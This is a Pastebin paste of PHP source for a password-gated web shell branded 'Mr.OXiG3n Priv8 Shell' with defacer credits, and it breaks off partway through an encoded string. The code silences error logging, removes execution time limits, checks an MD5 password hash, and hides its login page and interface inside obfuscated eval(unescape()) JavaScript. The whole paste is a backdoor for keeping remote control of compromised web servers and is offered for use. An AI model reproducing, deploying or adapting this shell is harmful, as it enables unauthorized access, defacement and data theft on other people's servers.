MrOXiG3n

Untitled

Apr 15th, 2020
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 71.34 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4.  
  5. if(get_magic_quotes_gpc()){
  6. foreach($_POST as $key=>$value){
  7. $_POST[$key] = stripslashes($value);
  8. }
  9. }
  10. session_start();
  11. error_reporting(0);
  12. @set_time_limit(0);
  13. @clearstatcache();
  14. @ini_set('error_log',NULL);
  15. @ini_set('log_errors',0);
  16. @ini_set('max_execution_time',0);
  17. @ini_set('output_buffering',0);
  18. @ini_set('display_errors', 0);
  19.  
  20. /* Configurasi */
  21. $oxig3n = "0814cecb1ffe7d664bc3b50d5888cf3e";
  22. $default_action = 'FilesMan';
  23. $default_use_ajax = true;
  24. $default_charset = 'UTF-8';
  25. date_default_timezone_set("Asia/Jakarta");
  26. function login_shell(){
  27. ?>
  28. <!DOCTYPE html>
  29. <html>
  30. <head>
  31. <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
  32. <meta name="theme-color" content="#343a40"/>
  33. <meta name="author" content="Mr.OXiG3n"/>
  34. <meta name="copyright" content="IES {DEFACER}"/>
  35. <link rel="icon" href="https://i.ibb.co/b1qcP9k/IMG-20200414-WA0000.jpg" type="image/jpg">
  36. <meta property="og:image"content="https://i.ibb.co/b1qcP9k/IMG-20200414-WA0000.jpg">
  37. <title>.:: Mr.OXiG3n Priv8 ::.</title>
  38. <!-- Bootstrap CSS -->
  39. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
  40. <link href="https://fonts.googleapis.com/css?family=Rock Salt|Righteous" rel="stylesheet">
  41. <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.1.0/css/font-awesome.min.css'>
  42. <script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
  43. <script src='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.2.0/js/bootstrap.min.js'></script>
  44. <script src='https://unpkg.com/sweetalert/dist/sweetalert.min.js'></script>
  45. <style type="text/css">
  46. body {
  47. background-image: url("http://www.al-mubarok.com/wp-content/uploads/2017/11/380624.jpg");
  48. color:#3AF9FF;
  49. background-attachment:fixed;
  50. background-repeat:no-repeat;
  51. background-position:center;
  52. background-color:#000;
  53. -webkit-background-size: 100% 100%;
  54. padding:15px;
  55. overflow-x:hidden;
  56. }
  57. </style>
  58. </head>
  59. <body>
  60. <script type="text/javascript">
  61. <!--
  62. eval(unescape('%66%75%6e%63%74%69%6f%6e%20%6c%33%63%66%32%39%33%62%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%33%35%36%30%36%39%32%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%35%33%37%35%32%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%35%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
  63. eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%6c%33%63%66%32%39%33%62%28%27') + '%47%60%66%7d%2c%68%73%61%7d%7b%45%22%6a%72%7a%71%60%67%73%68%70%20%7a%6d%78%7b%34%61%62%75%70%6a%75%22%77%7a%35%3d%25%45%1b%07%08%07%0e%43%6a%33%40%87%20%56%5b%67%44%3e%7a%25%57%70%6b%78%3a%20%80%47%3d%65%30%4a%12%0d%09%0b%0d%46%68%38%45%51%65%6c%78%71%27%40%63%6b%77%6c%76%72%7e%49%32%64%3a%41%46%68%74%33%46%10%09%07%06%08%48%75%27%6f%74%65%7f%7d%40%21%7b%71%34%31%25%69%73%76%7a%35%79%68%68%65%65%7f%3b%67%76%76%6c%24%44%44%6c%23%61%79%60%71%78%40%20%6e%65%22%6e%64%34%70%62%71%7b%6e%71%61%74%24%44%44%36%68%4a%2d%53%78%6a%64%7f%6f%26%56%71%6e%68%7a%49%32%7c%43%10%08%0b%0d%09%44%69%72%7e%7a%23%7b%6a%7b%6a%71%6a%45%22%77%72%71%71%21%4a%12%0d%09%0b%0d%09%44%6b%68%72%2d%6e%78%66%7a%7f%47%24%6c%71%75%74%3b%64%71%7d%7a%77%22%6b%70%72%7f%7b%34%65%7f%72%73%75%25%44%17%0c%09%0b%0c%08%07%49%6f%67%7b%27%6f%74%65%7f%7d%40%21%67%7b%73%73%79%30%6b%72%77%7d%70%30%73%7e%62%73%63%73%6b%20%46%11%08%0b%0c%08%07%06%08%48%69%6c%7c%20%6b%76%63%7a%7e%4b%2f%68%7a%75%78%7e%37%6f%70%71%78%73%3b%71%6c%74%79%25%44%44%6d%22%6d%73%60%71%70%44%2e%6b%64%22%6e%65%35%7f%7a%6c%7e%2f%45%48%34%6c%44%44%37%6e%6b%79%45%1b%07%08%07%0e%0c%09%44%37%6e%6b%79%45%1b%07%08%07%0e%0c%09%44%6d%74%70%78%7f%2c%71%78%7c%6a%40%20%70%65%7f%7d%7e%72%7e%61%21%2c%73%64%75%6f%41%20%70%64%7e%71%2f%23%7c%71%64%6f%6f%6e%73%74%6b%6c%7e%4a%21%53%78%68%70%20%4d%6e%36%31%35%2e%2d%6e%78%66%7a%7f%47%24%6c%71%75%74%3b%60%72%7a%79%75%73%74%24%44%17%0d%08%07%06%08%48%34%6b%69%7e%40%15%0a%0c%08%07%06%47%67%73%77%7d%7c%26%7e%7b%77%6c%4b%2f%7e%73%67%70%69%7c%24%22%6d%73%60%71%70%44%2e%67%7b%74%20%64%7e%76%30%6f%6f%7b%6a%63%77%27%60%7c%70%35%62%73%72%61%78%21%2c%68%73%61%7d%7b%45%22%69%72%7e%7a%34%61%74%71%7e%72%77%76%22%27%7d%6f%79%7c%63%42%25%56%71%6f%69%76%25%45%1b%07%08%07%0e%43%33%6e%77%70%77%41%14%06%06%08%48%66%27%6a%72%69%6c%47%25%6b%70%71%73%71%3f%36%33%79%7f%7b%36%64%6f%67%71%68%7a%6b%76%34%6f%79%34%71%75%6a%2e%2d%6e%78%66%7a%7f%47%24%7e%6f%7f%7f%3b%7a%7c%70%6a%6b%22%6e%6d%7a%6f%6b%34%6e%7c%7f%70%74%70%22%77%64%35%3d%25%45%41%7c%73%77%77%6c%6b%68%7a%22%2e%6a%72%7c%76%46%2c%37%37%31%3b%26%49%56%4b%52%5a%42%5e%47%46%51%22%4f%54%50%51%55%23%51%56%5e%50%4a%50%46%31%65%44%17%0d%08%07%49%32%60%6e%79%4423560692%36%39%38%36%39%30%32' + unescape('%27%29%29%3b'));
  64. // -->
  65. </script>
  66. <noscript><i>Javascript required</i></noscript>
  67. </body>
  68. </html>
  69. <?php
  70. exit;
  71. }
  72. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])){
  73. if(isset($_POST['pass']) && (md5($_POST['pass']) == $oxig3n)){
  74. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  75. }else{
  76. login_shell();
  77. }
  78. }
  79. ?>
  80. <html>
  81. <head>
  82. <title>.:: Mr.OXiG3n Priv8 Shell ::.</title>
  83. <link rel="icon" href="https://i.ibb.co/b1qcP9k/IMG-20200414-WA0000.jpg" type="image/jpg">
  84. <meta property="og:image"content="https://i.ibb.co/b1qcP9k/IMG-20200414-WA0000.jpg">
  85. <style type="text/css">
  86. .aw:hover {
  87. background: transparent;
  88. color: #ffffff;
  89. }
  90. </style>
  91. <script type="text/javascript">
  92. <!--
  93. eval(unescape('%66%75%6e%63%74%69%6f%6e%20%64%37%39%64%64%39%36%37%62%34%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%35%33%39%33%36%39%39%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%33%31%35%38%36%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%39%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
  94. eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%64%37%39%64%64%39%36%37%62%34%28%27') + '%34%69%5a%6d%69%62%6f%11%68%71%62%54%32%1e%68%5c%6b%62%23%65%5e%6e%59%6f%52%6f%67%64%6b%1d%3c%01%05%35%1b%25%21%1f%02%06%5f%6d%5c%6a%1a%68%63%5f%6b%5f%50%61%5b%1c%1e%18%24%28%18%28%2f%1d%28%54%1a%2a%29%1c%2a%22%19%29%36%1f%2c%58%14%2b%5b%1f%29%23%15%28%58%1a%29%28%19%25%2d%1b%2e%28%18%24%2c%18%2c%28%1d%2c%27%1a%29%29%1c%2d%39%19%2d%21%1f%2f%5c%14%21%5f%1f%27%34%15%2b%29%1a%2e%29%19%26%2f%1b%2a%27%18%27%2c%18%2f%24%1d%2f%53%1a%2e%24%1c%2d%20%19%2d%2f%1f%2b%5c%14%21%5f%1f%27%34%15%2b%29%1a%2e%29%19%26%2f%1b%2a%27%18%27%2e%18%2b%58%1d%2b%2f%1a%2e%24%1c%2e%52%19%2d%21%1f%2f%2f%14%2f%5b%1f%2e%2e%15%2b%23%1a%2e%5b%19%25%36%1b%2d%2b%18%20%2a%18%2f%2a%1d%2f%21%1a%2d%29%1c%2e%24%19%2e%29%1f%2b%2e%14%2c%2a%1f%2a%2f%15%2f%2b%1a%2a%28%19%21%36%1b%29%59%18%2e%5d%18%21%33%1d%2b%22%1a%2e%24%1c%2e%52%19%2d%21%1f%2f%29%14%2b%5b%1f%2d%28%15%2b%2e%1a%2e%2b%19%25%2e%1b%2d%27%18%24%29%18%2f%2c%1d%2b%23%1a%2a%58%1c%2a%2e%19%28%5f%1f%2b%22%14%2a%5c%1f%29%34%15%2f%5d%1a%24%59%19%2f%36%1b%2e%59%18%20%22%18%2c%58%1d%2c%2f%1a%29%2f%1c%29%55%19%29%2a%1f%2f%2f%14%2b%2d%1f%2d%2c%15%2b%23%1a%2e%2d%19%21%29%1b%2d%2b%18%24%5e%18%28%24%1d%29%51%1a%2d%2b%1c%28%52%19%2d%21%1f%28%5c%14%2f%20%1f%29%2d%15%2f%2b%1a%29%2f%19%22%21%1b%29%30%18%23%28%18%2c%33%1d%2c%21%1a%2e%33%1c%2e%50%19%23%5e%1f%26%35%14%2b%2a%1f%2d%59%15%2b%2d%1a%2a%2e%19%21%21%1b%2d%2d%18%24%2d%18%28%2a%1d%2c%2f%1a%2a%33%1c%2d%2e%19%2e%5d%1f%28%22%14%2c%20%1f%2a%5d%15%2c%23%1a%2e%31%19%21%21%1b%29%5a%18%20%22%18%28%29%1d%2c%54%1a%2a%59%1c%29%25%19%29%5a%1f%2c%2b%14%28%2c%1f%2d%2b%15%2f%5d%1a%2a%26%19%25%36%1b%2a%59%18%20%5c%18%2f%33%1d%2c%2f%1a%29%5a%1c%23%51%19%23%36%1f%26%35%14%28%2e%1f%29%23%15%2c%5d%1a%29%5a%19%21%21%1b%2f%2a%18%27%2e%18%28%2a%1d%28%38%1a%2a%5f%1c%29%27%19%2d%5a%1f%2c%28%14%28%2e%1f%2d%59%15%28%5f%1a%28%2b%19%25%29%1b%2e%28%18%27%2c%18%2d%29%1d%28%55%1a%2a%28%1c%29%25%19%2d%29%1f%28%2a%14%28%20%1f%2d%2c%15%2b%2d%1a%2d%2b%19%25%2a%1b%28%30%18%24%59%18%28%28%1d%2c%27%1a%2a%5a%1c%2d%55%19%29%2c%1f%2c%2a%14%2b%2f%1f%2e%2d%15%2e%2c%1a%2d%2a%19%21%29%1b%2e%30%18%20%29%18%2b%5a%1d%2c%54%1a%2a%59%1c%29%25%19%29%5a%1f%2c%2b%14%28%2c%1f%2d%2b%15%2c%34%1a%2a%31%19%24%5a%1b%2d%2a%18%20%59%18%2b%29%1d%28%27%1a%2a%2b%1c%2a%20%19%2f%2c%1f%2c%58%14%2b%2c%1f%2d%28%15%2e%2c%1a%2d%2a%19%21%29%1b%2e%30%18%20%35%18%2f%33%1d%2c%51%1a%2e%58%1c%2e%25%19%2d%36%1f%2b%5c%14%21%5f%1f%27%34%15%2b%5f%1a%24%59%19%2f%36%1b%2d%29%18%24%29%18%28%28%1d%2b%24%1a%29%2a%1c%29%55%19%2d%21%1f%2f%2c%14%2c%5e%1f%27%5c%15%2b%5f%1a%24%59%1b%28%26%35%07%01%58%64%5d%67%19%6f%64%59%62%5c%5f%64%5c%1b%17%19%29%2d%1f%2c%58%14%2b%2d%1f%2e%28%15%28%5f%1a%2e%2d%19%25%5a%1b%2d%2b%18%20%59%18%28%2d%1d%2b%21%1a%2a%33%1c%2a%22%19%29%2a%1f%28%2a%14%2b%5b%1f%2a%2d%15%28%2f%1a%2e%29%19%25%2f%1b%29%2b%18%20%2a%18%2f%2d%1f%25%1f%24%10%1d%1c%2f%27%19%2a%5f%1f%2f%2a%14%28%5c%1f%2e%2b%15%28%59%1a%2a%2c%19%26%2e%1b%2d%30%18%27%29%18%2b%29%1d%2e%23%1a%2e%5f%1c%2a%54%19%29%36%1f%2f%5f%14%28%5f%1f%2a%5f%15%28%5f%1a%2d%58%19%26%21%1b%2a%27%18%22%2f%18%2e%5a%1d%22%38%1a%2a%5f%1c%2a%20%19%29%5e%1f%2f%58%14%2f%2a%1f%2f%34%15%2d%2a%1a%24%5b%19%21%5d%1b%2a%29%18%20%29%18%2f%59%1d%28%53%1a%29%58%1c%2a%25%19%2a%5e%1f%2b%2f%14%2b%28%1f%2d%59%15%2b%2a%1a%2e%5a%19%26%36%1b%2d%30%18%23%58%18%2f%59%1d%2c%20%1a%2b%29%1c%29%21%19%2a%36%1f%2f%2c%14%28%5f%1f%2e%2e%15%2c%2d%1a%29%28%19%21%5d%1b%2e%5d%18%27%5d%18%28%5f%1d%2b%54%1a%2a%2d%1c%2a%52%19%29%36%1f%2a%2d%14%2e%2f%1f%27%29%15%2c%23%1a%2a%2c%19%21%5d%1b%2a%29%18%24%2b%18%2b%5e%1d%28%54%1a%29%33%1c%29%51%19%2a%2d%1f%2f%29%14%28%37%1f%2e%5c%15%28%5e%1a%29%29%19%25%2b%1b%2d%2c%18%24%28%18%2b%2f%1d%28%52%1a%2d%2e%1c%2d%23%19%2a%36%1f%2f%28%14%28%2e%1f%29%2f%15%2c%2d%1a%2e%5d%19%26%2e%1b%2d%5c%18%27%29%18%28%2b%1d%2f%38%1a%2d%58%1c%2e%20%19%29%5d%1f%2b%2c%14%2b%5c%1f%2d%58%15%28%2d%1a%29%26%19%25%21%1b%2d%2a%18%23%2e%18%2d%5f%1d%28%38%1a%2c%2e%1c%2e%54%19%28%5b%1f%2a%5e%14%28%20%1f%2a%5f%15%28%5f%1a%29%5d%19%25%2e%1b%2e%5b%18%24%35%18%2c%2f%1d%2f%22%1a%2d%2d%1c%2e%23%19%2e%5f%1f%2c%35%14%2b%2c%1f%2d%58%15%28%2d%1a%29%31%19%22%5b%1b%2e%5a%18%23%59%18%2c%5f%1d%2f%20%1a%2d%24%1c%2e%26%19%2e%5a%1f%2c%2b%14%2c%5e%1f%2d%23%15%2f%23%1a%29%5d%19%25%5a%1b%2e%5a%18%24%5c%18%2c%2f%1d%2f%24%1a%2a%2e%1c%2a%23%19%29%5b%1f%28%28%14%2f%5c%1f%2b%34%15%2d%2a%1a%24%5b%19%21%5d%1b%2a%29%18%20%29%18%2f%59%1d%28%54%1a%29%58%1c%2a%27%19%2a%28%1f%2f%28%14%2c%5d%1f%29%2c%15%2f%5f%1a%28%2d%19%23%2c%1b%29%30%18%22%5c%18%2d%2a%1d%2e%25%1a%2f%5a%1c%23%39%19%2d%2b%1f%28%2e%14%2f%2a%1f%29%5e%15%28%2d%1a%2e%2d%19%25%21%1b%2d%2e%18%24%5f%18%28%5f%1d%2b%21%1a%29%29%1c%2a%25%19%29%5e%1f%2b%2f%14%2b%2b%1f%2e%23%15%2b%5e%1a%2e%2d%19%25%21%1b%2e%58%18%27%2c%18%2b%29%1d%2b%24%1a%29%24%1c%2e%39%19%29%29%1f%2c%58%14%28%5b%1f%2d%2e%15%28%5e%1a%28%2b%19%20%5e%1b%24%2f%18%20%29%18%2f%59%1d%2c%22%1a%2e%59%1c%29%21%19%29%2a%1f%2c%35%14%28%2d%1f%2d%28%15%2b%2d%1a%2d%2f%19%26%2f%1b%2d%2b%18%24%35%18%2c%5a%1d%2b%20%1a%2a%29%1c%2a%23%19%29%36%1f%2c%2b%14%28%5f%1f%2a%29%15%2b%29%1a%2d%2f%19%22%5e%1b%2d%27%18%24%5d%18%28%59%1d%28%52%1a%2a%5e%1c%2a%54%19%2f%2c%1f%29%2f%14%21%5d%1f%29%5e%15%2c%23%1a%2a%2c%19%21%5d%1b%2e%27%18%24%28%18%2b%2b%1d%2b%25%1a%2a%2f%1c%2a%21%19%2a%28%1f%2f%5c%14%28%20%1f%2d%23%15%2f%2a%1a%2d%2c%19%26%5c%1b%2d%5d%18%24%59%18%28%24%1d%28%27%1a%29%58%1c%2a%25%19%2e%5c%1f%2c%35%14%2b%37%1f%2e%5c%15%2b%5e%1a%2e%31%19%26%5b%1b%28%2e%18%21%2c%18%21%2e%1d%2c%22%1a%2e%59%1c%2d%23%19%2d%2b%1f%2c%28%14%2b%2b%1f%2d%2c%15%2b%28%1a%2e%5c%19%26%5b%1b%2d%2a%18%27%5d%18%28%5b%1d%28%55%1a%2d%5a%1c%29%55%19%2a%28%1f%2f%22%14%28%29%1f%2e%58%15%2f%5c%1a%2a%58%19%22%5d%1b%29%29%18%23%29%18%2d%33%1d%2d%23%1a%20%2e%1c%2d%23%19%2d%2b%1f%28%2e%14%2f%2a%1f%2a%5d%15%2b%34%1a%2e%31%19%25%5b%1b%2d%2e%18%24%59%18%28%24%1d%2f%23%1a%2a%5f%1c%29%2e%19%29%5f%1f%2f%2d%14%2b%5a%1f%2e%58%15%2b%2c%1a%2d%31%19%26%5f%1b%2e%5c%18%23%2c%18%28%2b%1d%28%27%1a%29%2e%1c%29%53%19%2e%5c%1f%28%2e%14%2c%2b%1f%2a%5e%15%2f%23%1a%2a%31%19%21%5d%1b%29%28%18%23%29%18%2c%59%1d%2c%52%1a%2c%33%1c%2c%22%19%23%5c%1f%2e%2f%14%2e%2f%1f%27%29%15%2e%2f%1a%29%2f%19%26%21%1b%2d%5c%18%27%59%18%28%2c%1d%28%52%1a%2c%5b%29%2e%24%2a%2f%2b%28%2e%19%22%2b%1b%29%2a%18%23%2d%18%2c%29%1d%2f%38%1a%2d%2f%1c%2e%23%1b%13%24%14%6d%60%54%6c%5d%5b%67%58%16%1b%18%2f%2d%1d%2c%38%1a%2e%33%1c%2e%50%1b%24%26%31%05%04%2e%20%10%27%24%31%0d%04%37%20%69%5b%6c%68%61%6c%36%04%05%3a%60%62%6c%59%68%65%6f%6d%32%30%60%31%48%5d%69%5e%69%5b%6c%68%61%6c%14%69%58%61%69%64%6f%5f%5a%36%2e%66%32%30%26%61%6f%6f%5e%6f%63%66%6e%3d%02%06%30%6a%6f%79%66%58%11%68%71%62%54%32%19%68%5c%6b%62%23%5e%6c%69%1f%30%0c%07%30%63%64%63%6f%6c%6f%11%6f%68%66%17%59%6c%68%67%6e%38%23%22%5b%65%64%6e%62%23%59%65%66%5a%6a%59%5c%61%63%6b%20%52%60%63%25%5a%6e%63%33%59%5e%67%61%66%78%32%4b%5a%6c%61%62%69%24%34%07%00%5a%63%62%64%14%72%00%08%12%13%11%14%5c%63%6d%6d%23%5e%58%60%69%66%74%37%14%18%49%51%6a%62%68%6c%1d%2a%12%5e%6a%6a%6b%65%65%5a%35%07%01%13%1e%12%13%5c%65%62%63%61%37%1d%29%38%39%39%38%39%34%07%00%12%1f%11%10%5a%58%5e%6b%5b%6d%60%6f%64%5e%2c%5e%6c%68%58%5e%56%61%58%63%68%30%58%68%69%5b%58%32%00%08%12%13%11%14%58%5d%52%64%59%6a%66%68%6c%5e%20%6f%5f%66%59%50%6d%36%66%66%20%60%59%63%5a%5b%6a%37%0c%07%10%14%17%13%50%5d%5e%64%5d%68%63%64%63%5c%27%67%62%63%65%6f%66%65%64%34%52%5a%62%68%5c%6d%3b%01%05%11%14%16%12%51%5e%5d%61%5e%6d%6f%69%61%5d%27%5b%63%6b%60%6e%32%1a%23%2e%22%36%02%02%16%12%1f%11%23%6d%5c%5d%6b%65%6f%22%5a%59%5f%6a%58%6e%65%6c%61%52%21%6e%66%72%5d%34%1f%2e%20%24%1c%13%21%22%23%1a%31%05%04%7c%02%06%26%59%6f%6c%77%5f%66%69%66%66%50%76%36%63%65%67%69%60%58%22%5a%62%63%52%64%35%5e%66%61%62%21%6a%5a%63%5f%5a%63%37%2c%24%27%36%62%59%6b%6d%27%59%66%68%58%62%32%5a%58%6c%6e%58%6f%31%6f%5a%68%6d%5b%27%6a%63%51%5f%58%37%66%67%6b%61%5e%60%31%6d%58%60%6e%64%5c%5b%62%21%50%65%67%5d%65%35%6d%65%5f%5d%60%5d%37%2c%68%5b%5a%62%64%62%21%68%6c%5f%68%21%62%5a%64%5f%5a%6f%38%60%62%63%5f%33%21%6c%60%76%27%6c%6e%55%6c%20%6c%5f%62%59%52%6d%36%66%66%61%55%37%20%62%69%25%69%62%5a%6e%27%6a%58%6a%59%5e%6d%32%64%63%6d%5a%35%6f%6a%58%60%21%6e%5a%60%5d%5f%63%37%62%65%65%58%3b%5c%62%6f%58%5d%6c%39%2e%60%6c%17%6e%6f%66%64%5d%14%6a%6c%50%63%6d%64%58%6d%55%60%6f%34%64%59%5e%53%66%62%5d%31%21%23%2b%28%6f%5f%65%12%2d%28%2b%6a%5c%60%3b%58%62%63%68%25%6f%68%77%5b%32%28%6d%55%61%36%65%63%64%59%2c%59%5b%63%5e%5b%62%34%2c%23%2f%33%5c%6e%6f%5c%5f%69%20%60%5d%5f%66%6f%6b%34%2d%2f%2b%6a%5c%60%3b%6e%6d%5e%66%6b%65%63%66%61%66%31%5e%6f%66%62%6f%14%24%2d%24%6c%10%5f%58%6e%55%21%64%63%27%67%69%63%25%5e%5b%5a%66%57%6c%62%6a%66%5a%21%52%60%64%65%69%13%2c%2d%28%6c%14%5d%5d%62%5a%23%63%65%20%6f%69%6f%25%5a%67%6c%53%5a%6e%27%5a%62%6a%63%6d%11%26%29%29%62%11%5b%5b%6a%58%2d%65%61%22%65%6d%6e%2b%5f%61%6c%24%6e%56%5d%5f%60%6d%16%20%20%2a%6d%14%5c%5c%63%59%20%66%66%25%63%64%6d%73%34%64%58%52%65%5c%11%69%5b%6c%54%5a%62%14%58%61%52%12%1b%61%6a%5d%58%54%6f%6d%27%69%58%52%69%5e%5a%58%25%61%6e%6d%67%65%65%35%60%59%5f%6a%59%5d%25%7a%23%5e%68%65%76%62%6c%5c%63%69%61%6e%68%60%62%32%65%62%6c%59%70%72%26%58%6e%6d%37%5a%65%5a%68%63%26%21%5f%68%64%34%57%60%6a%5f%69%76%62%59%6b%6d%27%5a%59%52%60%6e%5b%6b%64%6f%60%35%63%65%64%59%7c%23%5e%68%65%21%54%63%5e%6a%69%22%20%51%6d%62%32%5d%62%53%69%6e%74%65%6d%6e%6b%66%62%5f%31%23%3b%5c%62%69%27%6b%5a%50%5d%61%6d%31%23%1e%22%13%21%14%24%2c%61%5a%63%14%69%5a%50%5d%1b%21%20%29%2c%22%25%2e%2f%2c%27%2c%2c%28%26%77%24%5c%63%63%22%58%60%6e%51%5c%67%5a%58%22%20%51%6d%62%32%5b%64%63%5d%5d%65%5f%5a%77%6e%61%5f%59%60%6f%79%34%21%2b%2f%75%20%51%6d%62%32%65%62%62%1a%35%5d%63%6b%5d%51%65%5b%58%20%35%6c%63%6f%19%26%5a%65%62%5e%5e%60%5c%5f%29%77%5e%6a%6a%6b%63%61%37%60%65%60%61%62%59%6d%72%5b%24%5c%63%63%22%58%60%6e%51%5c%67%5a%58%22%58%68%5a%64%58%6a%58%62%34%5f%66%69%59%5c%6b%5a%5c%14%58%21%50%6e%61%74%64%67%65%6d%6d%5b%6a%24%58%64%59%61%6d%69%30%60%6e%63%5b%77%25%5d%62%60%20%61%6a%61%61%50%6f%77%71%5a%62%6a%63%6d%37%19%5c%58%55%34%5e%5b%5a%66%57%6c%62%6a%66%5a%21%52%60%64%65%69%35%13%22%23%28%5a%5c%58%3a%5f%61%6a%5b%58%60%21%5e%60%60%67%6c%39%1c%20%24%2e%5d%54%58%70%23%5a%6a%60%2c%61%6e%63%64%5c%60%75%35%59%65%6c%59%61%74%5d%65%63%62%60%34%1e%5b%5e%5c%37%51%5e%5d%61%5e%6d%6f%69%61%5d%27%5b%63%6b%60%6e%32%1a%23%2e%28%34%5d%33%33%5c%6e%6f%5c%5f%69%20%53%63%67%60%6a%30%1f%2f%21%2a%2a%5a%5e%7d%20%5d%6d%66%25%62%61%66%63%5b%69%74%2c%58%62%5c%6f%6b%26%2d%5f%6c%66%24%63%60%65%60%5e%6a%71%34%55%60%5d%6f%6a%76%50%63%6b%22%69%5e%5d%53%60%69%32%27%13%2e%12%23%11%26%28%6c%54%62%10%6a%5e%5d%51%1a%23%25%2b%28%2f%2b%2f%2b%2f%23%21%25%25%70%23%5a%6a%60%2c%61%6e%63%64%5c%60%75%21%5d%63%6b%5d%51%65%5b%58%23%21%50%6e%61%22%64%68%65%6c%5e%6e%73%31%5f%69%6f%5c%5f%60%5d%5e%7a%5c%61%60%66%6d%38%1f%59%5b%5e%33%5c%50%5c%65%5d%69%62%65%60%5f%22%59%67%66%6e%6f%36%19%27%23%27%5c%59%5b%31%58%63%61%5d%5b%6a%24%5e%6f%66%62%6f%32%1b%22%2f%28%5e%5e%5d%70%2c%5c%6f%63%27%66%6c%68%62%5f%6a%70%35%6c%63%6f%19%32%5a%65%62%5e%5e%60%5c%5f%29%34%61%60%68%1e%20%53%66%6d%5b%59%67%55%5e%24%23%5b%5b%6e%68%6b%5b%20%25%5d%62%60%20%61%6a%61%61%50%6f%77%32%65%62%62%1a%35%5d%63%6b%5d%51%65%5b%58%20%35%6c%63%6f%19%26%5a%65%62%5e%5e%60%5c%5f%29%34%5c%5c%68%61%68%54%25%22%69%5f%62%67%30%21%5f%68%64%21%6f%6f%67%67%58%6d%79%20%5f%6f%65%66%5e%6e%68%62%27%6b%62%57%5b%67%5a%71%5b%63%6b%60%6e%32%1a%59%54%58%36%5f%5b%5b%67%56%6f%61%6f%65%5f%2d%5f%62%65%65%68%34%12%21%20%2e%29%5e%53%37%5d%60%6a%5a%59%61%22%5d%65%63%62%60%34%1e%21%24%2d%5f%51%5b%73%26%59%6f%6c%21%63%6f%63%65%5d%61%76%36%66%66%6f%16%34%5f%66%69%59%5c%6b%5a%5c%23%31%61%6f%6e%1b%23%58%61%6f%50%5f%64%5f%5b%24%2c%5d%5e%6d%63%6c%59%39%5b%61%59%6c%6e%2a%20%5d%6d%66%25%62%61%66%63%5b%69%74%38%60%62%6d%1c%30%5e%68%6c%5f%5a%63%58%52%25%35%63%65%6a%1a%2d%5d%67%69%58%5d%6a%59%5f%26%32%59%5f%63%66%6a%5f%31%59%6f%5f%68%6c%20%24%6f%57%60%69%36%25%5d%62%60%20%61%6a%61%61%50%6f%77%26%5b%6d%6f%62%5f%60%6d%64%21%63%60%59%5d%63%58%38%58%62%5c%6f%6b%77%51%60%68%27%6a%5b%51%5e%62%68%32%26%12%2f%11%20%14%25%2d%60%59%60%11%6a%5f%5c%50%19%20%20%28%2d%23%26%2d%2a%2f%22%20%24%26%73%07%01%21%62%59%6b%6d%27%5a%5d%6d%58%5b%6a%72%5e%6f%66%62%6f%32%1b%5e%52%2c%2b%28%2c%1c%69%61%63%60%6a%6a%5d%6d%6d%73%5b%04%05%2c%6e%58%69%68%25%5e%50%63%59%5f%69%35%54%63%5e%6a%69%22%5d%0c%07%22%68%5c%6b%62%21%5f%5e%66%5f%59%61%37%58%65%6d%58%60%77%5e%60%60%67%6c%39%1c%5f%2d%28%5f%20%5d%1c%66%67%66%63%61%6d%5f%66%6b%70%0d%04%21%5c%6f%6b%6e%6e%62%23%5e%60%67%55%21%64%63%64%6d%6e%39%37%23%6d%5c%5d%6b%65%6f%22%5e%61%66%54%22%6b%64%63%62%51%5e%20%5f%6f%6a%6e%6e%63%10%71%04%05%1e%12%69%66%69%61%5c%68%65%67%68%